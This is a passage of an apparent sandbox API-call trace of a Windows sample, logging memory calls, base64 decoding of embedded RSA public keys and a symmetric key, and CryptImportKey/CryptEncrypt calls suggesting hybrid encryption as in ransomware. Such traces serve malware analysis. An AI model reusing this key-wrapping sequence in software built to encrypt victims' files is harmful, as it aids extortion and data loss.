(_Size=0x7) returned 0x3f4bfb8 [0138.088] free (_Block=0x0) [0138.088] free (_Block=0x0) [0138.088] memchr (_Buf=0x3d802c6, _Val=32, _MaxCount=0x8) returned 0x0 [0138.088] malloc (_Size=0x9) returned 0x3648e78 [0138.088] free (_Block=0x0) [0138.089] free (_Block=0x0) [0138.089] free (_Block=0x3648ec0) [0138.089] free (_Block=0x3f4bff8) [0138.089] free (_Block=0x3f4bfb8) [0138.089] free (_Block=0x3648e78) [0138.089] free (_Block=0x3e22230) [0138.089] memchr (_Buf=0x3deff40, _Val=32, _MaxCount=0x40) returned 0x0 [0138.089] malloc (_Size=0x41) returned 0x3deff90 [0138.089] free (_Block=0x0) [0138.089] malloc (_Size=0x40) returned 0x3e223e0 [0138.089] free (_Block=0x0) [0138.089] free (_Block=0x0) [0138.089] malloc (_Size=0x41) returned 0x3deffe0 [0138.089] free (_Block=0x0) [0138.089] free (_Block=0x3deff90) [0138.089] free (_Block=0x3e223e0) [0138.089] memchr (_Buf=0x3defa90, _Val=32, _MaxCount=0x40) returned 0x0 [0138.089] malloc (_Size=0x41) returned 0x3defef0 [0138.089] free (_Block=0x0) [0138.089] malloc (_Size=0x40) returned 0x3e226f8 [0138.089] free (_Block=0x0) [0138.089] free (_Block=0x0) [0138.089] malloc (_Size=0x81) returned 0x60bf90 [0138.090] free (_Block=0x3deffe0) [0138.090] free (_Block=0x3defef0) [0138.090] free (_Block=0x3e226f8) [0138.090] memchr (_Buf=0x3e22620, _Val=32, _MaxCount=0x3c) returned 0x0 [0138.090] malloc (_Size=0x3d) returned 0x3e22668 [0138.090] free (_Block=0x0) [0138.090] malloc (_Size=0x40) returned 0x3e221a0 [0138.090] free (_Block=0x0) [0138.090] free (_Block=0x0) [0138.090] malloc (_Size=0xc1) returned 0x3594d18 [0138.090] free (_Block=0x60bf90) [0138.090] free (_Block=0x3e22668) [0138.090] free (_Block=0x3e221a0) [0138.090] memchr (_Buf=0x3d80300, _Val=32, _MaxCount=0x1c) returned 0x3d80308 [0138.090] malloc (_Size=0x9) returned 0x3648e00 [0138.090] free (_Block=0x0) [0138.091] malloc (_Size=0x40) returned 0x3e22590 [0138.091] free (_Block=0x0) [0138.091] free (_Block=0x0) [0138.091] memchr (_Buf=0x3d80309, _Val=32, _MaxCount=0x13) returned 0x3d8030c [0138.091] malloc (_Size=0x4) returned 0x3f4bfb8 [0138.091] free (_Block=0x0) [0138.091] free (_Block=0x0) [0138.091] memchr (_Buf=0x3d8030d, _Val=32, _MaxCount=0xf) returned 0x3d80313 [0138.091] malloc (_Size=0x7) returned 0x3f4c0b8 [0138.091] free (_Block=0x0) [0138.091] free (_Block=0x0) [0138.091] memchr (_Buf=0x3d80314, _Val=32, _MaxCount=0x8) returned 0x0 [0138.091] malloc (_Size=0x9) returned 0x3648de8 [0138.091] free (_Block=0x0) [0138.091] free (_Block=0x0) [0138.091] CryptStringToBinaryA (in: pszString="MIGJAoGBAMIKlS4ImF13BX+IOZFtsayNBkj9CdrOjQBwpoZlRA+z1NTngInlLrflxagbmRBwJso+dKNdebGHaqwYW0cytjXOVBXz6R0eWZfBPVXUiLN/mTCZxdUZ1tVRBUTR3Ia5+k6HS9dF5wtwWndlZOc4Esw4LU2k6gNuh2lIbs75C4zdAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339f970, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339f970, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0138.091] malloc (_Size=0x8c) returned 0x6066d8 [0138.092] free (_Block=0x0) [0138.092] CryptStringToBinaryA (in: pszString="MIGJAoGBAMIKlS4ImF13BX+IOZFtsayNBkj9CdrOjQBwpoZlRA+z1NTngInlLrflxagbmRBwJso+dKNdebGHaqwYW0cytjXOVBXz6R0eWZfBPVXUiLN/mTCZxdUZ1tVRBUTR3Ia5+k6HS9dF5wtwWndlZOc4Esw4LU2k6gNuh2lIbs75C4zdAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x6066d8, pcbBinary=0x339f970, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x6066d8, pcbBinary=0x339f970, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0138.092] malloc (_Size=0x8c) returned 0x3d81660 [0138.092] free (_Block=0x0) [0138.092] free (_Block=0x0) [0138.092] free (_Block=0x6066d8) [0138.092] free (_Block=0x3648e00) [0138.092] free (_Block=0x3f4bfb8) [0138.092] free (_Block=0x3f4c0b8) [0138.092] free (_Block=0x3648de8) [0138.092] free (_Block=0x3e22590) [0138.092] memchr (_Buf=0x3648d88, _Val=32, _MaxCount=0xb) returned 0x0 [0138.092] malloc (_Size=0xc) returned 0x3648e00 [0138.092] free (_Block=0x0) [0138.092] malloc (_Size=0x40) returned 0x3e22788 [0138.092] free (_Block=0x0) [0138.092] free (_Block=0x0) [0138.092] free (_Block=0x3648e00) [0138.092] free (_Block=0x3e22788) [0138.092] memchr (_Buf=0x3d801e8, _Val=32, _MaxCount=0x1e) returned 0x3d801f2 [0138.092] malloc (_Size=0xb) returned 0x3648cc8 [0138.092] free (_Block=0x0) [0138.093] malloc (_Size=0x40) returned 0x3e224b8 [0138.093] free (_Block=0x0) [0138.093] free (_Block=0x0) [0138.093] memchr (_Buf=0x3d801f3, _Val=32, _MaxCount=0x13) returned 0x3d801f6 [0138.093] malloc (_Size=0x4) returned 0x3f4bf48 [0138.093] free (_Block=0x0) [0138.093] free (_Block=0x0) [0138.093] memchr (_Buf=0x3d801f7, _Val=32, _MaxCount=0xf) returned 0x3d801fd [0138.093] malloc (_Size=0x7) returned 0x3f4bf58 [0138.093] free (_Block=0x0) [0138.093] free (_Block=0x0) [0138.093] memchr (_Buf=0x3d801fe, _Val=32, _MaxCount=0x8) returned 0x0 [0138.093] malloc (_Size=0x9) returned 0x3648c80 [0138.093] free (_Block=0x0) [0138.093] free (_Block=0x0) [0138.093] free (_Block=0x3648cc8) [0138.093] free (_Block=0x3f4bf48) [0138.093] free (_Block=0x3f4bf58) [0138.093] free (_Block=0x3648c80) [0138.093] free (_Block=0x3e224b8) [0138.093] memchr (_Buf=0x3df0030, _Val=32, _MaxCount=0x40) returned 0x0 [0138.093] malloc (_Size=0x41) returned 0x3def950 [0138.093] free (_Block=0x0) [0138.094] malloc (_Size=0x40) returned 0x3e22110 [0138.094] free (_Block=0x0) [0138.094] free (_Block=0x0) [0138.094] free (_Block=0x3def950) [0138.094] free (_Block=0x3e22110) [0138.094] memchr (_Buf=0x3def9f0, _Val=32, _MaxCount=0x40) returned 0x0 [0138.094] malloc (_Size=0x41) returned 0x3defc20 [0138.094] free (_Block=0x0) [0138.094] malloc (_Size=0x40) returned 0x3e22590 [0138.094] free (_Block=0x0) [0138.094] free (_Block=0x0) [0138.094] free (_Block=0x3defc20) [0138.094] free (_Block=0x3e22590) [0138.094] memchr (_Buf=0x3e22470, _Val=32, _MaxCount=0x3c) returned 0x0 [0138.094] malloc (_Size=0x3d) returned 0x3e226f8 [0138.094] free (_Block=0x0) [0138.094] malloc (_Size=0x40) returned 0x3e226b0 [0138.094] free (_Block=0x0) [0138.094] free (_Block=0x0) [0138.094] free (_Block=0x3e226f8) [0138.094] free (_Block=0x3e226b0) [0138.094] memchr (_Buf=0x3d80198, _Val=32, _MaxCount=0x1c) returned 0x3d801a0 [0138.095] malloc (_Size=0x9) returned 0x3648cb0 [0138.095] free (_Block=0x0) [0138.095] malloc (_Size=0x40) returned 0x3e22668 [0138.095] free (_Block=0x0) [0138.095] free (_Block=0x0) [0138.095] memchr (_Buf=0x3d801a1, _Val=32, _MaxCount=0x13) returned 0x3d801a4 [0138.095] malloc (_Size=0x4) returned 0x3f4bf38 [0138.095] free (_Block=0x0) [0138.095] free (_Block=0x0) [0138.095] memchr (_Buf=0x3d801a5, _Val=32, _MaxCount=0xf) returned 0x3d801ab [0138.095] malloc (_Size=0x7) returned 0x3f4c018 [0138.095] free (_Block=0x0) [0138.095] free (_Block=0x0) [0138.095] memchr (_Buf=0x3d801ac, _Val=32, _MaxCount=0x8) returned 0x0 [0138.095] malloc (_Size=0x9) returned 0x3648cf8 [0138.096] free (_Block=0x0) [0138.096] free (_Block=0x0) [0138.096] CryptStringToBinaryA (in: pszString="MIGJAoGBAOYBOPUSS6i47UIPvurHSn0y/MDsBnl2KnkU+BK5O85oRV13rI2NARq+5pzXDkqOiULrWZCPMwPHRdq1JK850CLLqn1ZUH51nHGXyffQw9HmMhNnymLoSVJxi/DMGtyVL5kX4domlVyOG0DqrvQOnvQWve/o5Zn8DA1QQs+eSgqTAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339f970, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339f970, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0138.096] malloc (_Size=0x8c) returned 0x6066d8 [0138.096] free (_Block=0x0) [0138.096] CryptStringToBinaryA (in: pszString="MIGJAoGBAOYBOPUSS6i47UIPvurHSn0y/MDsBnl2KnkU+BK5O85oRV13rI2NARq+5pzXDkqOiULrWZCPMwPHRdq1JK850CLLqn1ZUH51nHGXyffQw9HmMhNnymLoSVJxi/DMGtyVL5kX4domlVyOG0DqrvQOnvQWve/o5Zn8DA1QQs+eSgqTAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x6066d8, pcbBinary=0x339f970, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x6066d8, pcbBinary=0x339f970, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0138.096] malloc (_Size=0x8c) returned 0x3594de8 [0138.096] free (_Block=0x0) [0138.096] free (_Block=0x0) [0138.096] free (_Block=0x6066d8) [0138.096] free (_Block=0x3648cb0) [0138.096] free (_Block=0x3f4bf38) [0138.096] free (_Block=0x3f4c018) [0138.096] free (_Block=0x3648cf8) [0138.096] free (_Block=0x3e22668) [0138.096] memchr (_Buf=0x3f652c0, _Val=32, _MaxCount=0x13) returned 0x0 [0138.096] malloc (_Size=0x14) returned 0x3f65520 [0138.096] free (_Block=0x0) [0138.097] malloc (_Size=0x40) returned 0x3e22230 [0138.097] free (_Block=0x0) [0138.097] free (_Block=0x0) [0138.097] free (_Block=0x3f65520) [0138.097] free (_Block=0x3e22230) [0138.097] memchr (_Buf=0x3d80148, _Val=32, _MaxCount=0x19) returned 0x3d80152 [0138.097] malloc (_Size=0xb) returned 0x3648da0 [0138.097] free (_Block=0x0) [0138.097] malloc (_Size=0x40) returned 0x3e22668 [0138.097] free (_Block=0x0) [0138.097] free (_Block=0x0) [0138.097] memchr (_Buf=0x3d80153, _Val=32, _MaxCount=0xe) returned 0x0 [0138.097] malloc (_Size=0xf) returned 0x3648d58 [0138.097] free (_Block=0x0) [0138.097] free (_Block=0x0) [0138.097] free (_Block=0x3648da0) [0138.097] free (_Block=0x3648d58) [0138.097] free (_Block=0x3e22668) [0138.097] memchr (_Buf=0x3defe00, _Val=32, _MaxCount=0x40) returned 0x0 [0138.097] malloc (_Size=0x41) returned 0x3def950 [0138.097] free (_Block=0x0) [0138.097] malloc (_Size=0x40) returned 0x3e22500 [0138.098] free (_Block=0x0) [0138.098] free (_Block=0x0) [0138.098] free (_Block=0x3def950) [0138.098] free (_Block=0x3e22500) [0138.098] memchr (_Buf=0x3defb30, _Val=32, _MaxCount=0x40) returned 0x0 [0138.098] malloc (_Size=0x41) returned 0x3def950 [0138.098] free (_Block=0x0) [0138.098] malloc (_Size=0x40) returned 0x3e22428 [0138.098] free (_Block=0x0) [0138.098] free (_Block=0x0) [0138.098] free (_Block=0x3def950) [0138.098] free (_Block=0x3e22428) [0138.098] memchr (_Buf=0x3624988, _Val=32, _MaxCount=0x2c) returned 0x0 [0138.098] malloc (_Size=0x2d) returned 0x3624a30 [0138.098] free (_Block=0x0) [0138.098] malloc (_Size=0x40) returned 0x3e22158 [0138.098] free (_Block=0x0) [0138.098] free (_Block=0x0) [0138.098] free (_Block=0x3624a30) [0138.098] free (_Block=0x3e22158) [0138.098] memchr (_Buf=0x3f65460, _Val=32, _MaxCount=0x17) returned 0x3f65468 [0138.098] malloc (_Size=0x9) returned 0x3648da0 [0138.098] free (_Block=0x0) [0138.098] malloc (_Size=0x40) returned 0x3e22110 [0138.098] free (_Block=0x0) [0138.099] free (_Block=0x0) [0138.099] memchr (_Buf=0x3f65469, _Val=32, _MaxCount=0xe) returned 0x0 [0138.099] malloc (_Size=0xf) returned 0x3648d10 [0138.099] free (_Block=0x0) [0138.099] free (_Block=0x0) [0138.099] free (_Block=0x3648da0) [0138.099] free (_Block=0x3648d10) [0138.099] free (_Block=0x3e22110) [0138.099] memchr (_Buf=0x3d80080, _Val=32, _MaxCount=0x1a) returned 0x3d80098 [0138.099] malloc (_Size=0x19) returned 0x3d80210 [0138.099] free (_Block=0x0) [0138.099] malloc (_Size=0x40) returned 0x3e222c0 [0138.099] free (_Block=0x0) [0138.100] free (_Block=0x0) [0138.100] memchr (_Buf=0x3d80099, _Val=32, _MaxCount=0x1) returned 0x0 [0138.100] malloc (_Size=0x2) returned 0x3f4bfb8 [0138.100] free (_Block=0x0) [0138.100] free (_Block=0x0) [0138.100] free (_Block=0x3d80210) [0138.100] free (_Block=0x3f4bfb8) [0138.100] free (_Block=0x3e222c0) [0138.100] memchr (_Buf=0x3d802d8, _Val=32, _MaxCount=0x1c) returned 0x3d802e2 [0138.100] malloc (_Size=0xb) returned 0x3648d58 [0138.100] free (_Block=0x0) [0138.100] malloc (_Size=0x40) returned 0x3e22350 [0138.100] free (_Block=0x0) [0138.100] free (_Block=0x0) [0138.100] memchr (_Buf=0x3d802e3, _Val=32, _MaxCount=0x11) returned 0x3d802ea [0138.100] malloc (_Size=0x8) returned 0x3f4c048 [0138.100] free (_Block=0x0) [0138.100] free (_Block=0x0) [0138.100] memchr (_Buf=0x3d802eb, _Val=32, _MaxCount=0x9) returned 0x0 [0138.100] malloc (_Size=0xa) returned 0x3648e18 [0138.100] free (_Block=0x0) [0138.100] free (_Block=0x0) [0138.100] free (_Block=0x3648d58) [0138.100] free (_Block=0x3f4c048) [0138.101] free (_Block=0x3648e18) [0138.101] free (_Block=0x3e22350) [0138.101] memchr (_Buf=0x3defea0, _Val=32, _MaxCount=0x40) returned 0x0 [0138.101] malloc (_Size=0x41) returned 0x3defd10 [0138.101] free (_Block=0x0) [0138.101] malloc (_Size=0x40) returned 0x3e225d8 [0138.101] free (_Block=0x0) [0138.101] free (_Block=0x0) [0138.101] free (_Block=0x3defd10) [0138.101] free (_Block=0x3e225d8) [0138.101] memchr (_Buf=0x3defe50, _Val=32, _MaxCount=0x40) returned 0x0 [0138.101] malloc (_Size=0x41) returned 0x3defb80 [0138.101] free (_Block=0x0) [0138.101] malloc (_Size=0x40) returned 0x3e221e8 [0138.101] free (_Block=0x0) [0138.101] free (_Block=0x0) [0138.101] free (_Block=0x3defb80) [0138.101] free (_Block=0x3e221e8) [0138.101] memchr (_Buf=0x3648d40, _Val=32, _MaxCount=0xc) returned 0x0 [0138.101] malloc (_Size=0xd) returned 0x3648de8 [0138.101] free (_Block=0x0) [0138.101] malloc (_Size=0x40) returned 0x3e22110 [0138.101] free (_Block=0x0) [0138.101] free (_Block=0x0) [0138.101] free (_Block=0x3648de8) [0138.102] free (_Block=0x3e22110) [0138.102] memchr (_Buf=0x3d80328, _Val=32, _MaxCount=0x1a) returned 0x3d80330 [0138.102] malloc (_Size=0x9) returned 0x3648e00 [0138.102] free (_Block=0x0) [0138.102] malloc (_Size=0x40) returned 0x3e226b0 [0138.102] free (_Block=0x0) [0138.102] free (_Block=0x0) [0138.102] memchr (_Buf=0x3d80331, _Val=32, _MaxCount=0x11) returned 0x3d80338 [0138.102] malloc (_Size=0x8) returned 0x3f4bff8 [0138.102] free (_Block=0x0) [0138.102] free (_Block=0x0) [0138.102] memchr (_Buf=0x3d80339, _Val=32, _MaxCount=0x9) returned 0x0 [0138.102] malloc (_Size=0xa) returned 0x3648e48 [0138.102] free (_Block=0x0) [0138.102] free (_Block=0x0) [0138.102] free (_Block=0x3648e00) [0138.102] free (_Block=0x3f4bff8) [0138.102] free (_Block=0x3648e48) [0138.102] free (_Block=0x3e226b0) [0138.102] memchr (_Buf=0x3f65340, _Val=32, _MaxCount=0x12) returned 0x0 [0138.102] malloc (_Size=0x13) returned 0x3f65520 [0138.102] free (_Block=0x0) [0138.102] malloc (_Size=0x40) returned 0x3e226f8 [0138.103] free (_Block=0x0) [0138.103] free (_Block=0x0) [0138.103] free (_Block=0x3f65520) [0138.103] free (_Block=0x3e226f8) [0138.103] memchr (_Buf=0x36247b0, _Val=32, _MaxCount=0x35) returned 0x36247b7 [0138.103] malloc (_Size=0x8) returned 0x3f4bf18 [0138.103] free (_Block=0x0) [0138.103] malloc (_Size=0x40) returned 0x3e22398 [0138.103] free (_Block=0x0) [0138.103] free (_Block=0x0) [0138.103] memchr (_Buf=0x36247b8, _Val=32, _MaxCount=0x2d) returned 0x36247c7 [0138.103] malloc (_Size=0x10) returned 0x3648e48 [0138.103] free (_Block=0x0) [0138.103] free (_Block=0x0) [0138.103] memchr (_Buf=0x36247c8, _Val=32, _MaxCount=0x1d) returned 0x36247d3 [0138.103] malloc (_Size=0xc) returned 0x3648e78 [0138.103] free (_Block=0x0) [0138.103] free (_Block=0x0) [0138.103] memchr (_Buf=0x36247d4, _Val=32, _MaxCount=0x11) returned 0x36247d8 [0138.103] malloc (_Size=0x5) returned 0x3f4bf28 [0138.103] free (_Block=0x0) [0138.103] free (_Block=0x0) [0138.103] memchr (_Buf=0x36247d9, _Val=32, _MaxCount=0xc) returned 0x0 [0138.103] malloc (_Size=0xd) returned 0x3648da0 [0138.104] free (_Block=0x0) [0138.104] malloc (_Size=0x140) returned 0x3dd48d8 [0138.104] free (_Block=0x3e22398) [0138.104] free (_Block=0x0) [0138.104] free (_Block=0x3f4bf18) [0138.104] free (_Block=0x3648e48) [0138.104] free (_Block=0x3648e78) [0138.104] free (_Block=0x3f4bf28) [0138.104] free (_Block=0x3648da0) [0138.104] free (_Block=0x3dd48d8) [0138.104] memchr (_Buf=0x3e22080, _Val=32, _MaxCount=0x3b) returned 0x3e2208e [0138.104] malloc (_Size=0xf) returned 0x3648cf8 [0138.104] free (_Block=0x0) [0138.104] malloc (_Size=0x40) returned 0x3e225d8 [0138.104] free (_Block=0x0) [0138.104] free (_Block=0x0) [0138.104] memchr (_Buf=0x3e2208f, _Val=32, _MaxCount=0x2c) returned 0x0 [0138.104] malloc (_Size=0x2d) returned 0x36249f8 [0138.104] free (_Block=0x0) [0138.104] free (_Block=0x0) [0138.104] CryptStringToBinaryA (in: pszString="7b1Nd0cLDElUcIgBsXzL6HksR+CHCzcczI62JC8cxwg=", cchString=0x2c, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339f970, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339f970, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0138.104] malloc (_Size=0x20) returned 0x3d80210 [0138.105] free (_Block=0x0) [0138.105] CryptStringToBinaryA (in: pszString="7b1Nd0cLDElUcIgBsXzL6HksR+CHCzcczI62JC8cxwg=", cchString=0x2c, dwFlags=0x6, pbBinary=0x3d80210, pcbBinary=0x339f970, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d80210, pcbBinary=0x339f970, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0138.105] malloc (_Size=0x20) returned 0x3d80378 [0138.105] free (_Block=0x0) [0138.105] free (_Block=0x0) [0138.105] free (_Block=0x3d80210) [0138.105] free (_Block=0x3648cf8) [0138.105] free (_Block=0x36249f8) [0138.105] free (_Block=0x3e225d8) [0138.105] memchr (_Buf=0x3f65300, _Val=32, _MaxCount=0x12) returned 0x3f65306 [0138.105] malloc (_Size=0x7) returned 0x3f4c088 [0138.105] free (_Block=0x0) [0138.105] malloc (_Size=0x40) returned 0x3e22110 [0138.105] free (_Block=0x0) [0138.105] free (_Block=0x0) [0138.105] memchr (_Buf=0x3f65307, _Val=32, _MaxCount=0xb) returned 0x0 [0138.105] malloc (_Size=0xc) returned 0x3648e78 [0138.105] free (_Block=0x0) [0138.105] free (_Block=0x0) [0138.105] free (_Block=0x3f4c088) [0138.105] free (_Block=0x3648e78) [0138.105] free (_Block=0x3e22110) [0138.106] memchr (_Buf=0x3f654c0, _Val=32, _MaxCount=0x17) returned 0x3f654c6 [0138.106] malloc (_Size=0x7) returned 0x3f4bfc8 [0138.106] free (_Block=0x0) [0138.106] malloc (_Size=0x40) returned 0x3e227d0 [0138.106] free (_Block=0x0) [0138.106] free (_Block=0x0) [0138.106] memchr (_Buf=0x3f654c7, _Val=32, _MaxCount=0x10) returned 0x0 [0138.106] malloc (_Size=0x11) returned 0x3f65520 [0138.106] free (_Block=0x0) [0138.106] free (_Block=0x0) [0138.106] free (_Block=0x3f4bfc8) [0138.106] free (_Block=0x3f65520) [0138.106] free (_Block=0x3e227d0) [0138.106] memchr (_Buf=0x3f65280, _Val=32, _MaxCount=0x14) returned 0x3f65286 [0138.106] malloc (_Size=0x7) returned 0x3f4bfd8 [0138.106] free (_Block=0x0) [0138.106] malloc (_Size=0x40) returned 0x3e22740 [0138.106] free (_Block=0x0) [0138.106] free (_Block=0x0) [0138.106] memchr (_Buf=0x3f65287, _Val=32, _MaxCount=0xd) returned 0x0 [0138.106] malloc (_Size=0xe) returned 0x3648de8 [0138.106] free (_Block=0x0) [0138.106] free (_Block=0x0) [0138.107] free (_Block=0x3f4bfd8) [0138.107] free (_Block=0x3648de8) [0138.107] free (_Block=0x3e22740) [0138.107] memchr (_Buf=0x3f65360, _Val=32, _MaxCount=0x17) returned 0x3f65366 [0138.107] malloc (_Size=0x7) returned 0x3f4bf68 [0138.107] free (_Block=0x0) [0138.107] malloc (_Size=0x40) returned 0x3e227d0 [0138.107] free (_Block=0x0) [0138.107] free (_Block=0x0) [0138.107] memchr (_Buf=0x3f65367, _Val=32, _MaxCount=0x10) returned 0x0 [0138.107] malloc (_Size=0x11) returned 0x3f65520 [0138.107] free (_Block=0x0) [0138.107] free (_Block=0x0) [0138.107] free (_Block=0x3f4bf68) [0138.107] free (_Block=0x3f65520) [0138.107] free (_Block=0x3e227d0) [0138.107] memchr (_Buf=0x3f65380, _Val=32, _MaxCount=0x13) returned 0x3f65386 [0138.107] malloc (_Size=0x7) returned 0x3f4bf68 [0138.107] free (_Block=0x0) [0138.107] malloc (_Size=0x40) returned 0x3e22590 [0138.107] free (_Block=0x0) [0138.107] free (_Block=0x0) [0138.107] memchr (_Buf=0x3f65387, _Val=32, _MaxCount=0xc) returned 0x0 [0138.107] malloc (_Size=0xd) returned 0x3648c80 [0138.107] free (_Block=0x0) [0138.108] free (_Block=0x0) [0138.108] free (_Block=0x3f4bf68) [0138.108] free (_Block=0x3648c80) [0138.108] free (_Block=0x3e22590) [0138.108] memchr (_Buf=0x3f651e0, _Val=32, _MaxCount=0x16) returned 0x3f651e6 [0138.108] malloc (_Size=0x7) returned 0x3f4bfb8 [0138.108] free (_Block=0x0) [0138.108] malloc (_Size=0x40) returned 0x3e22230 [0138.108] free (_Block=0x0) [0138.108] free (_Block=0x0) [0138.108] memchr (_Buf=0x3f651e7, _Val=32, _MaxCount=0xf) returned 0x0 [0138.108] malloc (_Size=0x10) returned 0x3648de8 [0138.108] free (_Block=0x0) [0138.108] free (_Block=0x0) [0138.108] free (_Block=0x3f4bfb8) [0138.108] free (_Block=0x3648de8) [0138.108] free (_Block=0x3e22230) [0138.108] memchr (_Buf=0x3d80260, _Val=32, _MaxCount=0x18) returned 0x3d80266 [0138.108] malloc (_Size=0x7) returned 0x3f4bf78 [0138.108] free (_Block=0x0) [0138.108] malloc (_Size=0x40) returned 0x3e22230 [0138.109] free (_Block=0x0) [0138.109] free (_Block=0x0) [0138.109] memchr (_Buf=0x3d80267, _Val=32, _MaxCount=0x11) returned 0x0 [0138.109] malloc (_Size=0x12) returned 0x3f65520 [0138.109] free (_Block=0x0) [0138.109] free (_Block=0x0) [0138.109] free (_Block=0x3f4bf78) [0138.109] free (_Block=0x3f65520) [0138.109] free (_Block=0x3e22230) [0138.109] memchr (_Buf=0x3648db8, _Val=32, _MaxCount=0xa) returned 0x3648dbe [0138.109] malloc (_Size=0x7) returned 0x3f4c048 [0138.109] free (_Block=0x0) [0138.109] malloc (_Size=0x40) returned 0x3e22350 [0138.109] free (_Block=0x0) [0138.109] free (_Block=0x0) [0138.109] memchr (_Buf=0x3648dbf, _Val=32, _MaxCount=0x3) returned 0x0 [0138.109] malloc (_Size=0x4) returned 0x3f4c058 [0138.109] free (_Block=0x0) [0138.109] free (_Block=0x0) [0138.109] free (_Block=0x3f4c048) [0138.109] free (_Block=0x3f4c058) [0138.109] free (_Block=0x3e22350) [0138.110] memchr (_Buf=0x3d80238, _Val=32, _MaxCount=0x1a) returned 0x3d80243 [0138.110] malloc (_Size=0xc) returned 0x3648da0 [0138.110] free (_Block=0x0) [0138.110] malloc (_Size=0x40) returned 0x3e226f8 [0138.110] free (_Block=0x0) [0138.110] free (_Block=0x0) [0138.110] memchr (_Buf=0x3d80244, _Val=32, _MaxCount=0xe) returned 0x3d8024a [0138.110] malloc (_Size=0x7) returned 0x3f4bf18 [0138.110] free (_Block=0x0) [0138.110] free (_Block=0x0) [0138.110] memchr (_Buf=0x3d8024b, _Val=32, _MaxCount=0x7) returned 0x0 [0138.110] malloc (_Size=0x8) returned 0x3f4bf28 [0138.110] free (_Block=0x0) [0138.110] free (_Block=0x0) [0138.110] free (_Block=0x3648da0) [0138.110] free (_Block=0x3f4bf18) [0138.110] free (_Block=0x3f4bf28) [0138.110] free (_Block=0x3e226f8) [0138.110] memchr (_Buf=0x3f65500, _Val=32, _MaxCount=0x14) returned 0x0 [0138.110] malloc (_Size=0x15) returned 0x3f65520 [0138.110] free (_Block=0x0) [0138.111] malloc (_Size=0x40) returned 0x3e22350 [0138.111] free (_Block=0x0) [0138.111] free (_Block=0x0) [0138.111] free (_Block=0x3f65520) [0138.111] free (_Block=0x3e22350) [0138.111] memchr (_Buf=0x60bb78, _Val=32, _MaxCount=0x69) returned 0x60bb8a [0138.111] malloc (_Size=0x13) returned 0x3f65520 [0138.111] free (_Block=0x0) [0138.111] malloc (_Size=0x40) returned 0x3e221e8 [0138.111] free (_Block=0x0) [0138.111] free (_Block=0x0) [0138.111] memchr (_Buf=0x60bb8b, _Val=32, _MaxCount=0x56) returned 0x0 [0138.111] malloc (_Size=0x57) returned 0x60ef88 [0138.111] free (_Block=0x0) [0138.111] free (_Block=0x0) [0138.111] free (_Block=0x3f65520) [0138.111] free (_Block=0x60ef88) [0138.111] free (_Block=0x3e221e8) [0138.111] memchr (_Buf=0x3f654e0, _Val=32, _MaxCount=0x10) returned 0x0 [0138.111] malloc (_Size=0x11) returned 0x3f65520 [0138.111] free (_Block=0x0) [0138.112] malloc (_Size=0x40) returned 0x3e227d0 [0138.112] free (_Block=0x0) [0138.112] free (_Block=0x0) [0138.112] free (_Block=0x3f65520) [0138.112] free (_Block=0x3e227d0) [0138.112] memchr (_Buf=0x3d80350, _Val=32, _MaxCount=0x19) returned 0x3d8035a [0138.112] malloc (_Size=0xb) returned 0x3648e48 [0138.112] free (_Block=0x0) [0138.112] malloc (_Size=0x40) returned 0x3e221e8 [0138.112] free (_Block=0x0) [0138.112] free (_Block=0x0) [0138.112] memchr (_Buf=0x3d8035b, _Val=32, _MaxCount=0xe) returned 0x0 [0138.112] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x10, pbBuffer=0x3648c50 | out: pbBuffer=0x3648c50) returned 1 [0138.112] CryptDecodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x13, pbEncoded=0x3d81660, cbEncoded=0x8c, dwFlags=0x0, pvStructInfo=0x339f92c, pcbStructInfo=0x339f904 | out: pvStructInfo=0x339f92c, pcbStructInfo=0x339f904) returned 1 [0138.112] CryptImportKey (in: hProv=0x3cf450, pbData=0x339f92c, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x1, phKey=0x339f928 | out: phKey=0x339f928*=0x432d78) returned 1 [0138.113] CryptEncrypt (in: hKey=0x432d78, hHash=0x0, Final=1, dwFlags=0x40, pbData=0x6099c8*, pdwDataLen=0x339f8f8*=0x56, dwBufLen=0x80 | out: pbData=0x6099c8*, pdwDataLen=0x339f8f8*=0x80) returned 1 [0138.113] CryptDestroyKey (hKey=0x432d78) returned 1 [0138.113] CryptImportKey (in: hProv=0x3cf450, pbData=0x339f9c8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339f9c4 | out: phKey=0x339f9c4*=0x432978) returned 1 [0138.113] CryptSetKeyParam (hKey=0x432978, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0138.113] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f8d8*, pdwDataLen=0x339f83c*=0x10, dwBufLen=0x10 | out: pbData=0x339f8d8*, pdwDataLen=0x339f83c*=0x10) returned 1 [0138.113] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f8d8*, pdwDataLen=0x339f83c*=0x10, dwBufLen=0x10 | out: pbData=0x339f8d8*, pdwDataLen=0x339f83c*=0x10) returned 1 [0138.113] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f8d8*, pdwDataLen=0x339f83c*=0x10, dwBufLen=0x10 | out: pbData=0x339f8d8*, pdwDataLen=0x339f83c*=0x10) returned 1 [0138.113] CryptEncrypt (in: 